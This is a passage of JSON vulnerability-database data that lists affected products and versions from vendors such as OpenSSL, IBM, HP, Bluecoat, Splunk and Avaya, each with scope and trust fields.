"aspera mobile", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "0" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "cloudsystem foundation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0.2" }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "project openssl beta4", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "h.10", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "upward integration modules hardware management pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "netscaler application delivery controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.20" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "upward integration modules integrated installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "general parallel file system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.0" }, { "model": "norman shark scada protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.2" }, { "model": "project openssl beta5", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "tivoli netcool/system service monitor fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7967" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.1.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0" }, { "model": "aspera drive", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "0" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.9" }, { "model": "content analysis system", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.2" }, { "model": "content analysis system software", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1.53" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1.4" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "flex system chassis management module 1.20.1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "security analytics platform", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "6.6.10" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "norman shark scada protection", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "5.3.2" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "12500(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "v7)0" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8852" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8750" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.1" }, { "model": "security network intrusion prevention system gx5108", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "57000" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.5.0" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "2.3.1" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.1" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "systems director common agent for linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.5" }, { "model": "r", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "norman shark network protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.2" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.0.1" }, { "model": "esxi esxi550-20150110", "scope": "ne", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "kb", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.8.0" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "129000" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "nextscale n1200 enclosure fan power controller fhet24d-2.08", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.6" }, { "model": "i.10", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.2" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "project openssl 0.9.8za", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.0" }, { "model": "m.08", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.4.1" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "ssl visibility", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.8" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.3" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11150-11" }, { "model": "systems insight manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "infosphere master data management provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-493" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.8" }, { "model": "ssl visibility 3.8.2f", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": null }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "cloudsystem enterprise software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0.2" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.6" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.6" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.3.6" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-453" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0" }, { "model": "director", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "6.1.16.1" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.3" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-109" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "tivoli netcool/system service monitor fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.2" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.5" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.4" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-467" }, { "model": "vb", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1881" }, { "model": "connect:enterprise secure client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56001" }, { "model": "ka", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.2" }, { "model": "security analytics platform", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "7.1.6" }, { "model": "office connect pk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "18100" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v5000-" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "nextscale n1200 enclosure fan power controller fhet21e-2.05", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aspera proxy", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.2.2" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "norman shark network protection", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "5.3.2" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "yb", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "aspera connect server", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.5.1" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.1" }, { "model": "flex system chassis management module 1.40.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "upward integration modules scvmm add-in", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "systems director common agent for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.5" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "bcaaa", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.5" }, { "model": "nextscale n1200 enclosure fan power controller fhet24b-2.07", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.5.03.00" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.41" }, { "model": "aspera ondemand for google cloud", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.2.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.21" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "aura utility services sp7", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.1" }, { "model": "content analysis system software", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1.5.2" }, { "model": "aspera console", "scope": "ne", "trust": 0.3, "vendor": "asperasoft", "version": "2.5.3" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.63" }, { "model": "e", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "bladesystem c-class onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.20" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7779" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.3" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2.2" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1.2" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0.2" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.10" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.20" }, { "model": "splunk", "scope": "ne", "trust": 0.3, "vendor": "splunk", "version": "5.0.11" }, { "model": "tivoli netcool/system service monitor fp13", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "aspera faspex", "scope": "ne", "trust": 0.3, "vendor": "asperasoft", "version": "3.9" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.40" }, { "model": "msr2000 r0106p18", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "va", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.32" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aspera ondemand for softlayer", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "0" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.4" }, { "model": "tivoli netcool/system service monitor fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.4" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "aspera ondemand for azure", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "0" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "r2311p05", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5700" }, { "model": "aspera shares", "scope": "ne", "trust": 0.3, "vendor": "asperasoft", "version": "1.9" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0" }, { "model": "qradar risk manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "msm", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "6.46.4.2.1" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.3.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "aspera connect server", "scope": "ne", "trust": 0.3, "vendor": "asperasoft", "version": "3.5.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "aspera client", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "0" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "version control repository manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "systems director common agent for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.4" }, { "model": "aspera outlook plugin", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "0" }, { "model": "content analysis system software", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1.4.2" }, { "model": "project openssl 0.9.8zc", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.01" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "system management homepage 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.0" }, { "model": "director", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.1.131" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.5" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "ssl visibility", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.7" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.3.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.3" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.2" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.2.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.1" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56003" }, { "model": "sterling connect:enterprise http option", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.0.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.1.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.0" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "freebsd", "scope": "eq", "trust": 